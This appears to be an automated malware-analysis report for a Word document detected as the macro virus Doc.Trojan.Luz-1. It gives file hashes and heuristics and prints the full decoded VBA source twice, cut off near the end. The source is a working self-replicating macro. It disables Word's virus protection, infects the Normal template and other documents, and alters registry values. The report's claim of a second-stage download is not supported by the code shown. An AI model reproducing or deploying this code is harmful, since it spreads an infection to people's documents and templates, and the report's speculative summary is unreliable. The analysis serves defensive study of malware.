Office (OLE) malware analysis — malicious · 5297e24ad098fa16

MALICIOUS

Office (OLE)

41.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: bf28f2a2b926107012eb07f9b8f6f6b8 SHA-1: 3d72278aa549ec2befd52ef3e392bb2293177632 SHA-256: 5297e24ad098fa165947acfc5057347155b389ffd9836f4ecef751553fcfd3c5

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Luz-1'. It contains VBA macros that, when executed, attempt to write values to the registry keys 'RegisteredOwner' and 'RegisteredOrganization' under 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion'. Additionally, the macro attempts to export a form to 'c:\MS Office Luz.frm'. These actions suggest an attempt to establish persistence or download and execute a second-stage payload.

Heuristics 2

ClamAV: Doc.Trojan.Luz-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Luz-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13564 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13564 bytes
SHA-256: `32f246ff2487e05cfb71d94989d0569121093171d4e62d4deb526df9bd7ab3d4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' 1 Private Sub Document_Close() On Error Resume Next 'This is very important information 'please, do not delete or modify !!! Dim x, Contor As Integer Dim SaveDocument, SaveNormalTemplate, DocInf, NorInf As Boolean Dim AD, NT As Object Dim OurCode, OurCode2, LogData, LogFile, Temp As String Set AD = ActiveDocument.VBProject.VBComponents.Item(1) Set NT = NormalTemplate.VBProject.VBComponents.Item(1) DocInf = AD.CodeModule.Find("Am0r", 1, 1, 10000, 10000) NorInf = NT.CodeModule.Find("Am0r", 1, 1, 10000, 10000) Contor = 0 Options.VirusProtection = False Options.SaveNormalPrompt = False If (DocInf = True Xor NorInf = True) And _ (ActiveDocument.SaveFormat = wdFormatDocument Or _ ActiveDocument.SaveFormat = wdFormatTemplate) Then Randomize x = Int(Rnd * 20) If x = 10 Then MsgBox "Your name is " & Application.UserName, vbInformation, "Unrequested Info" If DocInf = True Then SaveNormalTemplate = NormalTemplate.Saved OurCode = AD.CodeModule.lines(2, AD.CodeModule.countoflines - 1) OurCode = "' 1" & Chr(13) & OurCode NT.CodeModule.deletelines 1, NT.CodeModule.countoflines NT.CodeModule.addfromstring OurCode System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Luz Clarita" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "Am0r A La Mexicana" ActiveDocument.VBProject.VBComponents.Item(2).Export ("c:\MS Office Luz.frm") NormalTemplate.VBProject.VBComponents.Import ("c:\MS Office Luz.frm") If SaveNormalTemplate = True Then NormalTemplate.Save End If If NorInf = True And _ (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _ ActiveDocument.Saved = False) Then SaveDocument = ActiveDocument.Saved OurCode = NT.CodeModule.lines(1, NT.CodeModule.countoflines) OurCode2 = OurCode Contor = Int(Trim(Mid(OurCode2, 2, 3))) + 1 OurCode2 = NT.CodeModule.lines(2, NT.CodeModule.countoflines - 1) Temp = Trim("'" & Str(Contor) & Chr(13)) OurCode2 = Temp + OurCode2 AD.CodeModule.deletelines 1, AD.CodeModule.countoflines AD.CodeModule.addfromstring OurCode NT.CodeModule.deletelines 1, NT.CodeModule.countoflines NT.CodeModule.addfromstring OurCode2 NormalTemplate.VBProject.VBComponents.Item(2).Export ("c:\MS Office Luz.frm") ActiveDocument.VBProject.VBComponents.Import ("c:\MS Office Luz.frm") If SaveDocument = True Then ActiveDocument.Save End If End If If Contor >= 66 Then MsgBox "Hello! " & _ "My name is Luz Clarita and I'm a very friendly macro-virus." & _ Chr(13) & "You should share your documents with your friends... :-)" & _ Chr(13) & "I salut you from Romania!", vbExclamation, "SALUT!" Joculetz.Show End If End Sub Private Sub Document_New() End Sub Attribute VB_Name = "Joculetz" Attribute VB_Base = "0{3087F2FC-E9D8-11D3-ACD9-900936D3B526}{3087F2F6-E9D8-11D3-ACD9-900936D3B526}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() Joculetz.Hide CommandButton1.Caption = "Aha" End Sub Private Sub UserForm_Activate() a = 1 b = 5 Do Label1.Font.Size = Label1.Font.Size + a CommandButton1.Left = CommandButton1.Left + b If Label1.Font.Size >= 35 Then a = -a If CommandButton1.Left >= Joculetz.Width - 70 Then b = -b If Label1.Font.Size < 8 Then a = -a If CommandButton1.Left < 20 Then b = -b For i = 1 To 100 CommandButton1.Caption = Str(i) Next i CommandButton1.Caption = "Okay" dummy = DoEvents Loop Until CommandButton1.Caption = "Aha" End Sub Private S ... (truncated)

SHA-256: 32f246ff2487e05cfb71d94989d0569121093171d4e62d4deb526df9bd7ab3d4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' 1
Private Sub Document_Close()
On Error Resume Next

'This is very important information
'please, do not delete or modify !!!

Dim x, Contor As Integer
Dim SaveDocument, SaveNormalTemplate, DocInf, NorInf As Boolean
Dim AD, NT As Object
Dim OurCode, OurCode2, LogData, LogFile, Temp As String

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
DocInf = AD.CodeModule.Find("Am0r", 1, 1, 10000, 10000)
NorInf = NT.CodeModule.Find("Am0r", 1, 1, 10000, 10000)
Contor = 0

Options.VirusProtection = False
Options.SaveNormalPrompt = False

If (DocInf = True Xor NorInf = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
 ActiveDocument.SaveFormat = wdFormatTemplate) Then
 Randomize
 x = Int(Rnd * 20)
 If x = 10 Then MsgBox "Your name is " & Application.UserName, vbInformation, "Unrequested Info"
 
 If DocInf = True Then
   SaveNormalTemplate = NormalTemplate.Saved
   OurCode = AD.CodeModule.lines(2, AD.CodeModule.countoflines - 1)
   OurCode = "' 1" & Chr(13) & OurCode
   NT.CodeModule.deletelines 1, NT.CodeModule.countoflines
   NT.CodeModule.addfromstring OurCode
   System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Luz Clarita"
   System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "Am0r A La Mexicana"
   ActiveDocument.VBProject.VBComponents.Item(2).Export ("c:\MS Office Luz.frm")
   NormalTemplate.VBProject.VBComponents.Import ("c:\MS Office Luz.frm")
   If SaveNormalTemplate = True Then NormalTemplate.Save
 End If
 
 If NorInf = True And _
   (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
    ActiveDocument.Saved = False) Then
   SaveDocument = ActiveDocument.Saved
   OurCode = NT.CodeModule.lines(1, NT.CodeModule.countoflines)
    OurCode2 = OurCode
    Contor = Int(Trim(Mid(OurCode2, 2, 3))) + 1
    OurCode2 = NT.CodeModule.lines(2, NT.CodeModule.countoflines - 1)
    Temp = Trim("'" & Str(Contor) & Chr(13))
    OurCode2 = Temp + OurCode2
   AD.CodeModule.deletelines 1, AD.CodeModule.countoflines
   AD.CodeModule.addfromstring OurCode
   NT.CodeModule.deletelines 1, NT.CodeModule.countoflines
   NT.CodeModule.addfromstring OurCode2
   NormalTemplate.VBProject.VBComponents.Item(2).Export ("c:\MS Office Luz.frm")
   ActiveDocument.VBProject.VBComponents.Import ("c:\MS Office Luz.frm")
   If SaveDocument = True Then ActiveDocument.Save
 End If
End If
If Contor >= 66 Then
 MsgBox "Hello! " & _
 "My name is Luz Clarita and I'm a very friendly macro-virus." & _
 Chr(13) & "You should share your documents with your friends... :-)" & _
 Chr(13) & "I salut you from Romania!", vbExclamation, "SALUT!"
 Joculetz.Show
End If
End Sub

Private Sub Document_New()

End Sub





























Attribute VB_Name = "Joculetz"
Attribute VB_Base = "0{3087F2FC-E9D8-11D3-ACD9-900936D3B526}{3087F2F6-E9D8-11D3-ACD9-900936D3B526}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





Private Sub CommandButton1_Click()
Joculetz.Hide
CommandButton1.Caption = "Aha"
End Sub

Private Sub UserForm_Activate()
a = 1
b = 5
Do
 Label1.Font.Size = Label1.Font.Size + a
 CommandButton1.Left = CommandButton1.Left + b
 If Label1.Font.Size >= 35 Then a = -a
 If CommandButton1.Left >= Joculetz.Width - 70 Then b = -b
 If Label1.Font.Size < 8 Then a = -a
 If CommandButton1.Left < 20 Then b = -b
 For i = 1 To 100
   CommandButton1.Caption = Str(i)
 Next i
 CommandButton1.Caption = "Okay"
 dummy = DoEvents
Loop Until CommandButton1.Caption = "Aha"
End Sub

Private S
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.